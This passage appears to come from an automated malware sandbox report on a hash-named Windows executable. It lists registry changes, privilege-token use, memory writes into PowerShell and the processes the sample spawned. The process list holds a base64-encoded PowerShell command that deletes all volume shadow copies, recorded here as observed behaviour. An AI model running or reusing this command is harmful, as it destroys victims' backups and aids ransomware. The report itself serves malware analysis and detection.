| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2608 wrote to memory of 1328 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2608 wrote to memory of 1328 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe
"C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe"
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files